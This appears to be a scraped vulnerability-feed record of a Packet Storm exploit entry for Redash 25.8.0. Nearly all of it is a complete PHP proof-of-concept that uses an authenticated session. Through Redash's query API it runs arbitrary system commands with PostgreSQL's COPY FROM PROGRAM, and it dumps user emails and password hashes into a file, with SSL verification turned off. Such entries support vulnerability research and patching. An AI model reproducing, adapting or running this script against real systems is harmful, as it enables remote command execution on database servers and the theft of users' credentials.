{“lastseen”:”2026-02-18T17:36:32″,”description”:”This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. The tool leverages a configuration vulnerability in Redash’s default PostgreSQL setup to perform two critical attacks. It can execute…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction”,”source”:””,”references”:””,”id”:”PACKETSTORM:215802″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Redash 25.8.0 Password Hash Extraction |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/redash.io\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. \\n The tool leverages a configuration vulnerability in Redash’s default PostgreSQL setup to perform two critical attacks:\\n \\t\\t\\t\\t \\n [+] Key Capabilities:\\n \\n Remote Command Execution (RCE) – Executes arbitrary system commands on the database server using PostgreSQL’s COPY FROM PROGRAM functionality\\n \\n Password Hash Extraction – Extracts password hashes from Redash’s internal user authentication table\\n \\n [+] POC :\\n \\n \\u003c?php\\n \/*\\n * poc.php\\n *\\n * =Usage=\\n \\n * php poc.php \\u003curl\\u003e \\u003ccookie_file\\u003e [–cmd \\u003ccommand\\u003e | –dump]\\n \\n * Example: php poc.php http:\/\/localhost:5000 cookie.txt –cmd \\”id\\”\\n \\n * Example: php poc.php http:\/\/localhost:5000 cookie.txt –dump\\n *\/\\n \\n error_reporting(E_ALL);\\n ini_set(‘display_errors’, 1);\\n \\n $GLOBALS[‘ssl_verify’] = false;\\n \\n function print_usage($script_name) {\\n echo \\”Usage: php $script_name \\u003curl\\u003e \\u003ccookie_file\\u003e [–cmd \\u003ccommand\\u003e | –dump]\\\\n\\\\n\\”;\\n echo \\”Examples:\\\\n\\”;\\n echo \\” php $script_name http:\/\/localhost:5000 cookie.txt –cmd ‘id’\\\\n\\”;\\n echo \\” php $script_name $script_name http:\/\/localhost:5000 cookie.txt –dump\\\\n\\\\n\\”;\\n }\\n \\n function load_cookies($path) {\\n $cookies = [];\\n if (!file_exists($path)) {\\n die(\\”Error: Cookie file not found: $path\\\\n\\”);\\n }\\n \\n $lines = file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n foreach ($lines as $line) {\\n if (trim($line) === ” || $line[0] === ‘#’) {\\n continue;\\n }\\n \\n $parts = explode(\\”\\\\t\\”, $line);\\n if (count($parts) \\u003e= 7) {\\n $cookies[$parts[5]] = $parts[6];\\n }\\n }\\n \\n return $cookies;\\n }\\n \\n function normalize_url($url) {\\n $url = rtrim($url, ‘\/’);\\n \\n if (strpos($url, ‘http:\/\/’) === 0 || strpos($url, ‘https:\/\/’) === 0) {\\n return $url;\\n }\\n \\n $protocols = [‘https:\/\/’, ‘http:\/\/’];\\n foreach ($protocols as $protocol) {\\n $test_url = $protocol . $url;\\n $ch = curl_init($test_url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_NOBODY =\\u003e true,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e $GLOBALS[‘ssl_verify’],\\n CURLOPT_SSL_VERIFYHOST =\\u003e $GLOBALS[‘ssl_verify’],\\n CURLOPT_TIMEOUT =\\u003e 3\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($http_code \\u003e 0) {\\n return $test_url;\\n }\\n }\\n \\n return ‘http:\/\/’ . $url;\\n }\\n \\n function find_api_path($base_url, $cookies) {\\n $session = create_session($cookies);\\n \\n $paths = [\\n \\”\/api\/query_results\\”,\\n \\”\/default\/api\/query_results\\”,\\n \\”\/org\/api\/query_results\\”,\\n ];\\n \\n foreach ($paths as $path) {\\n $url = $base_url . $path;\\n try {\\n $response = http_post($session, $url, [\\n \\”query\\” =\\u003e \\”SELECT 1\\”,\\n \\”data_source_id\\” =\\u003e 1,\\n \\”parameters\\” =\\u003e []\\n ]);\\n \\n if ($response[‘status’] == 200 || $response[‘status’] == 400) {\\n return $path;\\n }\\n } catch (Exception $e) {\\n }\\n }\\n \\n return $paths[0];\\n }\\n \\n function create_session($cookies) {\\n $cookie_string = ”;\\n foreach ($cookies as $name =\\u003e $value) {\\n $cookie_string .= $name . ‘=’ . $value . ‘; ‘;\\n }\\n \\n return [\\n ‘cookies’ =\\u003e rtrim($cookie_string, ‘; ‘),\\n ‘headers’ =\\u003e [\\n ‘Content-Type: application\/json’,\\n ‘Accept: application\/json’\\n ]\\n ];\\n }\\n \\n function http_get($session, $url, $timeout = 15) {\\n $ch = curl_init($url);\\n \\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_HTTPHEADER =\\u003e $session[‘headers’],\\n CURLOPT_COOKIE =\\u003e $session[‘cookies’],\\n CURLOPT_SSL_VERIFYPEER =\\u003e $GLOBALS[‘ssl_verify’],\\n CURLOPT_SSL_VERIFYHOST =\\u003e $GLOBALS[‘ssl_verify’],\\n CURLOPT_TIMEOUT =\\u003e $timeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n curl_close($ch);\\n \\n if ($error \\u0026\\u0026 $http_code == 0) {\\n throw new Exception(\\”HTTP request failed: $error\\”);\\n }\\n \\n return [\\n ‘status’ =\\u003e $http_code,\\n ‘body’ =\\u003e $response,\\n ‘json’ =\\u003e json_decode($response, true)\\n ];\\n }\\n \\n function http_post($session, $url, $data, $timeout = 30) {\\n $ch = curl_init($url);\\n \\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e json_encode($data),\\n CURLOPT_HTTPHEADER =\\u003e array_merge($session[‘headers’], [‘Content-Type: application\/json’]),\\n CURLOPT_COOKIE =\\u003e $session[‘cookies’],\\n CURLOPT_SSL_VERIFYPEER =\\u003e $GLOBALS[‘ssl_verify’],\\n CURLOPT_SSL_VERIFYHOST =\\u003e $GLOBALS[‘ssl_verify’],\\n CURLOPT_TIMEOUT =\\u003e $timeout,\\n CURLOPT_FOLLOWLOCATION =\\u003e true\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n $error = curl_error($ch);\\n curl_close($ch);\\n \\n if ($error \\u0026\\u0026 $http_code == 0) {\\n throw new Exception(\\”HTTP request failed: $error\\”);\\n }\\n \\n return [\\n ‘status’ =\\u003e $http_code,\\n ‘body’ =\\u003e $response,\\n ‘json’ =\\u003e json_decode($response, true)\\n ];\\n }\\n \\n function execute_rce($base_url, $cookies, $command) {\\n $session = create_session($cookies);\\n $api_path = find_api_path($base_url, $cookies);\\n $endpoint = $base_url . $api_path;\\n \\n $table = \\”rce_\\” . substr(md5($command), 0, 8);\\n \\n $payload = [\\n \\”query\\” =\\u003e \\”CREATE UNLOGGED TABLE IF NOT EXISTS $table AS SELECT ‘1’ WHERE 1=0; COPY $table FROM PROGRAM ‘$command’; SELECT * FROM $table\\”,\\n \\”data_source_id\\” =\\u003e 1,\\n \\”parameters\\” =\\u003e []\\n ];\\n \\n $resp = http_post($session, $endpoint, $payload);\\n \\n if ($resp[‘status’] != 200) {\\n throw new Exception(\\”Query submission failed: HTTP \\” . $resp[‘status’] . \\” – check credentials \/ session expiration\\”);\\n }\\n \\n $result = $resp[‘json’];\\n \\n if (isset($result[‘query_result’])) {\\n $rows = $result[‘query_result’][‘data’][‘rows’];\\n $output = [];\\n foreach ($rows as $row) {\\n if (isset($row[‘?column?’])) {\\n $output[] = $row[‘?column?’];\\n }\\n }\\n return $output;\\n }\\n \\n $job_id = $result[‘job’][‘id’] ?? null;\\n if (!$job_id) {\\n throw new Exception(\\”Failed to submit query: \\” . print_r($result, true));\\n }\\n \\n $deadline = time() + 60;\\n while (time() \\u003c $deadline) {\\n $job_url = $base_url . \\”\/api\/jobs\/$job_id\\”;\\n $job_resp = http_get($session, $job_url);\\n \\n if ($job_resp[‘status’] != 200) {\\n throw new Exception(\\”Failed to poll job: HTTP \\” . $job_resp[‘status’]);\\n }\\n \\n $job = $job_resp[‘json’][‘job’] ?? [];\\n \\n if (($job[‘status’] ?? 0) == 3) { \/\/ Complete\\n $result_id = $job[‘query_result_id’] ?? null;\\n $result_paths = [\\n \\”\/api\/query_results\/$result_id\\”,\\n \\”\/default\/api\/query_results\/$result_id\\”\\n ];\\n \\n foreach ($result_paths as $res_path) {\\n try {\\n $url = $base_url . $res_path;\\n $res = http_get($session, $url);\\n if ($res[‘status’] == 200) {\\n $rows = $res[‘json’][‘query_result’][‘data’][‘rows’];\\n $output = [];\\n foreach ($rows as $row) {\\n if (isset($row[‘?column?’])) {\\n $output[] = $row[‘?column?’];\\n }\\n }\\n return $output;\\n }\\n } catch (Exception $e) {\\n }\\n }\\n throw new Exception(\\”Could not fetch query results\\”);\\n }\\n \\n if (($job[‘status’] ?? 0) == 4) { \/\/ Failed\\n throw new Exception(\\”Job failed: \\” . ($job[‘error’] ?? ‘Unknown error’));\\n }\\n \\n usleep(500000); \/\/ 0.5 seconds\\n }\\n \\n throw new Exception(\\”Job did not complete\\”);\\n }\\n \\n function extract_password_hashes($base_url, $cookies) {\\n $session = create_session($cookies);\\n $api_path = find_api_path($base_url, $cookies);\\n $endpoint = $base_url . $api_path;\\n $payload = [\\n \\”query\\” =\\u003e \\”SELECT email, password_hash FROM users\\”,\\n \\”data_source_id\\” =\\u003e 1,\\n \\”parameters\\” =\\u003e []\\n ];\\n \\n $resp = http_post($session, $endpoint, $payload);\\n \\n if ($resp[‘status’] != 200) {\\n throw new Exception(\\”Query submission failed: HTTP \\” . $resp[‘status’] . \\” – check credentials \/ session expiration\\”);\\n }\\n \\n $result = $resp[‘json’];\\n \\n if (isset($result[‘query_result’])) {\\n $rows = $result[‘query_result’][‘data’][‘rows’];\\n $hash_list = [];\\n foreach ($rows as $row) {\\n $email = $row[’email’] ?? ”;\\n $password_hash = $row[‘password_hash’] ?? ”;\\n if ($password_hash \\u0026\\u0026 strpos($password_hash, ‘$’) === 0 \\u0026\\u0026 $email) {\\n $hash_list[] = [$email, $password_hash];\\n }\\n }\\n return $hash_list;\\n }\\n \\n $job_id = $result[‘job’][‘id’] ?? null;\\n if (!$job_id) {\\n throw new Exception(\\”Failed to submit query: \\” . print_r($result, true));\\n }\\n \\n $deadline = time() + 60;\\n while (time() \\u003c $deadline) {\\n $job_url = $base_url . \\”\/api\/jobs\/$job_id\\”;\\n $job_resp = http_get($session, $job_url);\\n \\n if ($job_resp[‘status’] != 200) {\\n throw new Exception(\\”Failed to poll job: HTTP \\” . $job_resp[‘status’]);\\n }\\n \\n $job = $job_resp[‘json’][‘job’] ?? [];\\n \\n if (($job[‘status’] ?? 0) == 3) { \/\/ Complete\\n $result_id = $job[‘query_result_id’] ?? null;\\n $result_paths = [\\n \\”\/api\/query_results\/$result_id\\”,\\n \\”\/default\/api\/query_results\/$result_id\\”\\n ];\\n \\n foreach ($result_paths as $res_path) {\\n try {\\n $url = $base_url . $res_path;\\n $res = http_get($session, $url);\\n if ($res[‘status’] == 200) {\\n $rows = $res[‘json’][‘query_result’][‘data’][‘rows’];\\n $hash_list = [];\\n foreach ($rows as $row) {\\n $email = $row[’email’] ?? ”;\\n $password_hash = $row[‘password_hash’] ?? ”;\\n if ($password_hash \\u0026\\u0026 strpos($password_hash, ‘$’) === 0 \\u0026\\u0026 $email) {\\n $hash_list[] = [$email, $password_hash];\\n }\\n }\\n return $hash_list;\\n }\\n } catch (Exception $e) {\\n }\\n }\\n throw new Exception(\\”Could not fetch query results\\”);\\n }\\n \\n if (($job[‘status’] ?? 0) == 4) { \/\/ Failed\\n throw new Exception(\\”Job failed: \\” . ($job[‘error’] ?? ‘Unknown error’));\\n }\\n \\n usleep(500000); \/\/ 0.5 seconds\\n }\\n \\n throw new Exception(\\”Job did not complete\\”);\\n }\\n \\n function main($argv) {\\n if (count($argv) \\u003c 3) {\\n print_usage($argv[0]);\\n exit(1);\\n }\\n \\n $url = $argv[1];\\n $cookie_file = $argv[2];\\n $mode = \\”–dump\\”;\\n $command = null;\\n \\n if (count($argv) \\u003e 3) {\\n if ($argv[3] == \\”–cmd\\”) {\\n $mode = \\”–cmd\\”;\\n if (count($argv) \\u003c 5) {\\n echo \\”Error: –cmd requires a command argument\\\\n\\”;\\n exit(1);\\n }\\n $command = $argv[4];\\n } elseif ($argv[3] == \\”–dump\\”) {\\n $mode = \\”–dump\\”;\\n } else {\\n echo \\”Error: Unknown option {$argv[3]}\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n try {\\n $url = normalize_url($url);\\n $cookies = load_cookies($cookie_file);\\n \\n if ($mode == \\”–cmd\\”) {\\n fwrite(STDERR, \\”[*] Executing command: $command\\\\n\\\\n\\”);\\n $output = execute_rce($url, $cookies, $command);\\n foreach ($output as $line) {\\n echo $line . \\”\\\\n\\”;\\n }\\n } else { \/\/ –dump\\n fwrite(STDERR, \\”[*] Extracting password hashes…\\\\n\\”);\\n $hash_list = extract_password_hashes($url, $cookies);\\n fwrite(STDERR, \\”[*] Found \\” . count($hash_list) . \\” password hashes\\\\n\\\\n\\”);\\n \\n if (empty($hash_list)) {\\n fwrite(STDERR, \\”No password hashes found\\\\n\\”);\\n exit(1);\\n }\\n $hash_file = fopen(‘hashes.txt’, ‘w’);\\n foreach ($hash_list as $hash_entry) {\\n list($email, $password_hash) = $hash_entry;\\n echo $email . \\”\\\\n\\”;\\n echo $password_hash . \\”\\\\n\\\\n\\”;\\n fwrite($hash_file, $password_hash . \\”\\\\n\\”);\\n }\\n fclose($hash_file);\\n \\n fwrite(STDERR, \\”[*] Hashes written to hashes.txt\\\\n\\”);\\n }\\n } catch (Exception $e) {\\n echo \\”Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n if (php_sapi_name() === ‘cli’) {\\n main($argv);\\n } else {\\n echo \\”This script must be run from the command line.\\\\n\\”;\\n }\\n ?\\u003e\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215802″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215802\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-18T17:36:32″,”description”:”This PHP script is a security exploitation tool that targets Redash, an open-source data visualization platform. The tool leverages a configuration vulnerability in Redash’s default…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41411","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n